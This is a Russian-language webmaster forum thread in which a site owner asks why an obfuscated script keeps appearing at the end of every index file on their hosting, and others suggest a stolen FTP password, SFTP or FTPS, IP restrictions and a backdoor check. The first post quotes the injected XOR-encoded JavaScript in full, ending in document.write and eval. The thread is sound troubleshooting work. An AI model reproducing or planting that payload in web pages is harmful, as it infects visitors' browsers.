Реклама на сайте Advertise with us

Вирусы на сайте/хостинге

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 12.06.04
Сообщения: 122

Ссылка на сообщениеДобавлено: 13/02/10 в 00:37       Ответить с цитатойцитата 

Второй раз уже на хостинге у всех сайтов в конце индексных файлов появляется такая дрянь:

Код:
<script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1)uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2)snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","13475b424311134d404b5611135c4c5d465f5b11594e5d0f5b4a425f66695d4e424a124b404c5a424a415b014c5d4a4e5b4a6a434a424a415b070846495d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a0708464b0803087d7c66695d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a07085c5d4c080308475b5b5f1500004c43464c44025f40465c44014c4042005b474a5d4a004641014c484610180806145b4a425f66695d4e424a015c5b56434a0159465c464d4643465b56120847464b4b4a4108145b4a425f66695d4e424a015c5b56434a0158464b5b4712081f5f5708145b4a425f66695d4e424a015c5b56434a01474a4648475b12081f5f57081466695d4e424a604d450f120f4b404c5a424a415b014d404b56014e5f5f4a414b6c4746434b075b4a425f66695d4e424a061413005c4c5d465f5b1113004d404b56111300475b424311"];eval(rpnsxy[0]);</script>


C учетом того что хостер серьезный думал что ноги этой дряни растут от моего компьютера, прошуршал все антивирусом(NOD), поменял антивирус(KIS) и прошуршал еще раз, и вновь эта беда. Хотелось бы понять, это все же моя беда, либо стоит трясти хостера?

0
 

АНГЕЛ

С нами с 01.11.01
Сообщения: 33061
Рейтинг: 10694


Передовик Master-X (16.02.2004) Передовик Master-X (01.03.2004) Передовик Master-X (16.06.2004) Передовик Master-X (01.07.2004) Передовик Master-X (16.07.2004) Ветеран трепа Master-X (01.08.2004)
Ссылка на сообщениеДобавлено: 13/02/10 в 00:41       Ответить с цитатойцитата 

Индекс пхп ?
Была такая хуйня. Снёс и сделал индекс хтмл ;)

Недвижимость в Праге и аренда посуточно
Книга о сексе и не только )

0
 

Дизайн, вёрстка, то сё

С нами с 16.10.02
Сообщения: 4875
Рейтинг: 3947

Ссылка на сообщениеДобавлено: 13/02/10 в 01:01       Ответить с цитатойцитата 

скорее всего "ушел" пароль на фтп

Респонсивная верстка - icq 282886909

0
 



С нами с 12.06.04
Сообщения: 122

Ссылка на сообщениеДобавлено: 13/02/10 в 02:20       Ответить с цитатойцитата 

Sebastano Perero: без разницы, index.hml или index.php. На одном аккаунте больше 10 сайтов висит, у всех одна и та же беда случилась.

awa: похоже так и есть, поскольку сейчас проверил несколько сайтов на другом хосте - та же беда... что лучше использовать в качестве FTP-клиента?

0
 



С нами с 13.08.04
Сообщения: 222
Рейтинг: 105

Ссылка на сообщениеДобавлено: 13/02/10 в 02:59       Ответить с цитатойцитата 

Скорее дело не в том какой клиент, а как ушел пароль FTP. Пароль может уходить с твоего компа и из сети. Для того, что бы пароль не передавался по сети в открытом виде нужно использовать протокол SFTP. А какой при этом будет использоваться клиент не так важно.

0
 



С нами с 20.01.03
Сообщения: 18003
Рейтинг: 9760


Передовик Master-X (01.03.2005) Передовик Master-X (16.03.2005) Передовик Master-X (16.10.2016) Передовик Master-X (01.11.2016) Передовик Master-X (16.11.2016) Ветеран трепа Master-X (01.12.2016)
Ссылка на сообщениеДобавлено: 13/02/10 в 04:51       Ответить с цитатойцитата 

пароли хранились в фтп-клиенте?

0
 



С нами с 18.11.99
Сообщения: 14226

Ссылка на сообщениеДобавлено: 13/02/10 в 04:56       Ответить с цитатойцитата 

Переходите на SFTP с разрешенным входом только с вашего IP, и будет счастье.

0
 



С нами с 28.02.03
Сообщения: 8544
Рейтинг: 1609

Ссылка на сообщениеДобавлено: 13/02/10 в 13:09       Ответить с цитатойцитата 

Если нет возможности ограничить по Ip доступ

То я делаю так

Идешь в
C:\WINDOWS\system32\drivers\etc

В файл hosts пишет
(Ip ftp сервера ) пробел любое имя

Sample
123.123.123.123 ftphost1


в итоге что мы имеем вирус п$здит учету

логин и пароль но зайти на сервер ftphost1 на другом компе не реально

многим помогло

Сдам место в подписи. Предложения в личку.

0
 

Bitcoin

С нами с 18.11.01
Сообщения: 4709
Рейтинг: 3066


Передовик Master-X (16.09.2021) Передовик Master-X (01.10.2021)
Ссылка на сообщениеДобавлено: 13/02/10 в 14:35       Ответить с цитатойцитата 

Возможно дырявые скрипты.

Tube.Cash выкупит ваш трафик на галеры, заплатит за переходы с эмбедов

0
 

www.2dayhost.com

С нами с 16.12.02
Сообщения: 1530
Рейтинг: 755

Ссылка на сообщениеДобавлено: 13/02/10 в 14:56       Ответить с цитатойцитата 

Yahook, даже если первый взлом был не через дырявый скрипт, cейчас на хосте ТС (с большой долей вероятности) уже лежит backdoor для переодического добавление левого кода в index.php файлы
Поэтому, даже после смены пароля и всего остального что тут уже советовали, детальная инспекция всех файлов на хостинге - обязательна ;)

2dayHost

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 14/02/10 в 13:56       Ответить с цитатойцитата 

http://ru.wikipedia.org/wiki/SFTP
http://ru.wikipedia.org/wiki/FTPS

совершенно разные вещи, строго говоря, и из личного опыта советую использование FTPS - гораздо меньше проблем, можно прикрутить антивир/парсер, и т.д., и нет проблем с мониторингом активности.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »